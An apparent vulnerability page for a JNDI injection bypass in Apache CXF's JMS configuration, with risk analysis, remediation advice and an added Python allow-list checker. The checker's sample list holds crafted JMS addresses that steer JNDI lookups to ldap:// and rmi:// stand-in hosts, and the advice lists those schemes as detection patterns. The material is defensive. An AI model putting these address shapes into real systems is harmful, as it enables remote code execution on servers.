Description
A further incomplete fix for a previous advisory CVE-2026-44417 (Untrusted JMS configuration can lead to RCE) for Apache CXF has been identified, which can allow code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue.
Published: 2026-06-12
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

This vulnerability is a JNDI injection flaw in the JMSConfigFactory component of Apache CXF's JMS transport that can lead to arbitrary code execution when untrusted parties are allowed to supply JMS configuration. It is published as a further incomplete fix for CVE-2026-44417 (Untrusted JMS configuration can lead to RCE): the earlier patch did not close every path by which attacker-supplied configuration reaches a JNDI lookup. The assigned weaknesses are CWE-20 (improper input validation) and CWE-502 (deserialization of untrusted data), which together describe the usual JNDI injection chain: a caller-controlled JNDI name or provider URL is resolved through InitialContext, and the reference or serialized object the lookup returns is loaded or deserialized inside the server process. The CVSS v3.1 vector (AV:N/AC:H/PR:N/UI:N) models a network-reachable, unauthenticated attacker facing high attack complexity; in practice the flaw is only reachable where an application lets users it does not trust set CXF's JMS configuration (JMS endpoint addresses or the JNDI settings behind them).

Affected Systems

Affected systems are Apache CXF deployments that let untrusted users supply JMS configuration. The advisory provides fixes in Apache CXF 4.2.2 (4.2.x line) and 4.1.7 (4.1.x line); earlier releases on those lines remain vulnerable, including releases that carry only the fix for CVE-2026-44417, since this issue is a bypass of that fix. The page cites no fixed version for other release lines, so deployments on them should be treated as unpatched until the vendor states otherwise. The NVD CPE entry (cpe:2.3:a:apache:cxf:*) likewise carries no version bound.

Risk and Exploitability

The CVSS v3.1 score of 8.1 (High) comes from the vector AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H: a successful exploit yields full confidentiality, integrity and availability impact, i.e. code execution with the privileges of the CXF process, while the high attack complexity reflects that the attacker must get configuration into a deployment that accepts it from untrusted users (the initial 9.8 assessment with AC:L was revised down on the day of publication, as the history below records). The SSVC assessment (Exploitation: none, Automatable: no, Technical Impact: total) and an EPSS below 1% indicate no observed exploitation and a low near-term probability, and the CVE is not in the CISA KEV catalog; absence from KEV means CISA has not recorded in-the-wild exploitation, not that none has occurred. Public JNDI injection tooling is mature, so once an exposed configuration path is identified the step from injection to code execution is short. Environments that allow untrusted parties to set JMS endpoint addresses or JNDI properties are the ones exposed; where only administrators can, the preconditions are not met, but the upgrade is still warranted because the earlier fix proved incomplete and the same configuration surface may be opened later.

Generated by OpenCVE AI on June 18, 2026 at 12:53 UTC.

Remediation

Vendor fix: upgrade to Apache CXF 4.2.2 or 4.1.7, as stated in the advisory description. No vendor workaround is published; the recommended actions below are compensating controls, not a substitute for the upgrade.

OpenCVE Recommended Actions

  • Upgrade to Apache CXF 4.2.2 or 4.1.7, which resolve the JNDI injection in JMSConfigFactory. Because this is the second fix in the series started by CVE-2026-44417, keep tracking the Apache CXF security advisories for further revisions rather than assuming the issue is closed.
  • Restrict JMS configuration to trusted administrators or services. Treat JMS endpoint addresses and JNDI settings (initial context factory, provider URL, connection factory and destination names) as deployment configuration, never as input a caller may supply.
  • Where untrusted input must influence JMS configuration, allow‑list it at the application layer: accept only pre‑approved JNDI provider URLs and context factory classes, and reject lookup names that carry a URL scheme (ldap:, rmi:, http:, ...). Pattern blocklists are fragile. Validation addresses CWE‑20; CWE‑502 (deserialization of what a JNDI lookup returns) is only closed by not performing attacker‑controlled lookups at all.
  • Audit existing JMS endpoint addresses and JNDI provider URLs in configuration and request logs for schemes such as ldap://, ldaps://, rmi:// or http:// pointing outside the broker network, and alert on unexpected outbound LDAP or RMI connections from hosts running CXF.
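The following is an added example (not Apache CXF code) of the application-level allow-list recommended above and of the JNDI lookup path described under Impact: a policy check over CXF JMS endpoint addresses that refuses any JNDI provider URL, initial context factory or connection factory name that is not pre-approved, and flags lookup names that carry a URL scheme, since InitialContext dispatches a lookup of "ldap://..." to the LDAP URL context factory regardless of the configured provider. It assumes the CXF JMS URI form jms:<variant>:<destination>?jndiInitialContextFactory=...&jndiURL=...&jndiConnectionFactoryName=... documented for the CXF JMS transport; the allow-list values, broker host and sample addresses are constructed for the example.

```python
"""Allow-list check for Apache CXF JMS endpoint addresses (added example, not CXF code).

Assumes the CXF JMS URI form
  jms:<variant>:<destination>?jndiInitialContextFactory=...&jndiURL=...&jndiConnectionFactoryName=...
with <variant> being jndi, queue or topic. The allow-list values and the
sample addresses below are constructed for this example.
"""
import re
from urllib.parse import parse_qs

# Deployment-specific allow-list: the only JNDI settings this application may use.
ALLOWED_CONTEXT_FACTORIES = {"org.apache.activemq.jndi.ActiveMQInitialContextFactory"}
ALLOWED_JNDI_URLS = {"tcp://broker.internal:61616"}
ALLOWED_CONNECTION_FACTORIES = {"ConnectionFactory"}

KNOWN_VARIANTS = ("jndi", "queue", "topic")

# A lookup name with a URL scheme (ldap:, rmi:, ...) is dispatched by
# InitialContext to that scheme's URL context factory, whatever provider is configured.
URL_SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def parse_jms_address(address):
    """Split 'jms:<variant>:<destination>?k=v&k=v' into (variant, destination, params)."""
    if not address.startswith("jms:"):
        raise ValueError("not a jms: address")
    variant, sep, tail = address[len("jms:"):].partition(":")
    if not sep or not variant:
        raise ValueError("missing variant")
    destination, _, query = tail.partition("?")
    # Last occurrence of a repeated key wins; a stricter policy could reject duplicates.
    params = {k: v[-1] for k, v in parse_qs(query, keep_blank_values=True).items()}
    return variant, destination, params


def check_jms_address(address):
    """Return (accepted, reason). Only allow-listed JNDI settings and plain names pass."""
    try:
        variant, destination, params = parse_jms_address(address)
    except ValueError as exc:
        return False, str(exc)
    if variant not in KNOWN_VARIANTS:
        return False, "unknown variant: " + variant
    icf = params.get("jndiInitialContextFactory")
    if icf is not None and icf not in ALLOWED_CONTEXT_FACTORIES:
        return False, "initial context factory not allowed: " + icf
    url = params.get("jndiURL")
    if url is not None and url not in ALLOWED_JNDI_URLS:
        return False, "jndiURL not allowed: " + url
    # Absent parameters fall back to server-side configuration, which the caller
    # does not control; present ones must match the allow-list exactly.
    cf = params.get("jndiConnectionFactoryName", "ConnectionFactory")
    if cf not in ALLOWED_CONNECTION_FACTORIES:
        return False, "connection factory name not allowed: " + cf
    if not destination or URL_SCHEME.match(destination):
        return False, "destination is not a plain JNDI name: " + destination
    return True, "ok"


def audit(addresses):
    """Return (address, reason) for every rejected address, for a config or log review."""
    return [(a, r) for a in addresses for ok, r in [check_jms_address(a)] if not ok]


# Constructed samples: two benign addresses followed by shapes an attacker could
# use to steer the JNDI lookup (203.0.113.10 is a documentation address).
SAMPLES = [
    "jms:jndi:orders.queue?jndiInitialContextFactory=org.apache.activemq.jndi.ActiveMQInitialContextFactory&jndiURL=tcp://broker.internal:61616",
    "jms:queue:orders.queue",
    "jms:jndi:orders.queue?jndiInitialContextFactory=org.apache.activemq.jndi.ActiveMQInitialContextFactory&jndiURL=ldap://203.0.113.10:1389/Exploit",
    "jms:jndi:orders.queue?jndiInitialContextFactory=com.sun.jndi.ldap.LdapCtxFactory&jndiURL=ldap://203.0.113.10:1389/Exploit",
    "jms:jndi:orders.queue?jndiConnectionFactoryName=rmi://203.0.113.10:1099/cf",
    "jms:jndi:ldap://203.0.113.10:1389/Exploit",
    "jms:queue:orders.queue?jndiURL=ldap://203.0.113.10:1389/Exploit",
]

if __name__ == "__main__":
    for addr in SAMPLES:
        ok, reason = check_jms_address(addr)
        print("ACCEPT" if ok else "REJECT", addr, "" if ok else "(" + reason + ")")
```

The check is deliberately an allow-list: anything not explicitly approved is refused, including a bare destination name that carries a URL scheme, which is the shape that bypasses provider-level restrictions. Run it against the endpoint addresses your application is prepared to accept from callers and against addresses already recorded in configuration or logs.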

Advisories

No advisories yet.

History

Wed, 17 Jun 2026 12:15:00 +0000

Type         Values Removed / Values Added
Weaknesses   added: CWE-502
References
Metrics      threat_severity removed: None
             threat_severity added: Important

Fri, 12 Jun 2026 19:00:00 +0000

Type                 Values Removed / Values Added
First Time appeared  added: Apache
                     added: Apache cxf
Weaknesses           added: NVD-CWE-noinfo
CPEs                 added: cpe:2.3:a:apache:cxf:*:*:*:*:*:*:*:*
Vendors & Products   added: Apache
                     added: Apache cxf

Fri, 12 Jun 2026 15:30:00 +0000

Type      Values Removed / Values Added
Metrics   cvssV3_1 removed: {'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}
          cvssV3_1 added:   {'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}
          ssvc removed: {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}
          ssvc added:   {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 12 Jun 2026 14:30:00 +0000

Type      Values Removed / Values Added
Metrics   cvssV3_1 added: {'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}
          ssvc added: {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 12 Jun 2026 09:45:00 +0000

Type         Values Removed / Values Added
Description  added: A further incomplete fix for a previous advisory CVE-2026-44417 (Untrusted JMS configuration can lead to RCE) for Apache CXF has been identified, which can allow code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue.
Title        added: Apache CXF: JNDI Injection Vulnerability in JMSConfigFactory
Weaknesses   added: CWE-20
References

MITRE

Status: PUBLISHED

Assigner: apache

Published:

Updated: 2026-07-02T12:05:01.070Z

Reserved: 2026-06-05T11:08:49.320Z

Link: CVE-2026-50632

Vulnrichment

Updated: 2026-07-02T12:05:01.070Z

NVD

Status : Analyzed

Published: 2026-06-12T10:16:23.183

Modified: 2026-06-12T18:58:03.547

Link: CVE-2026-50632

Redhat

Severity : Important

Public Date: 2026-06-12T09:00:48Z

Links: CVE-2026-50632 - Bugzilla

OpenCVE Enrichment

Updated: 2026-06-18T13:00:16Z

Weaknesses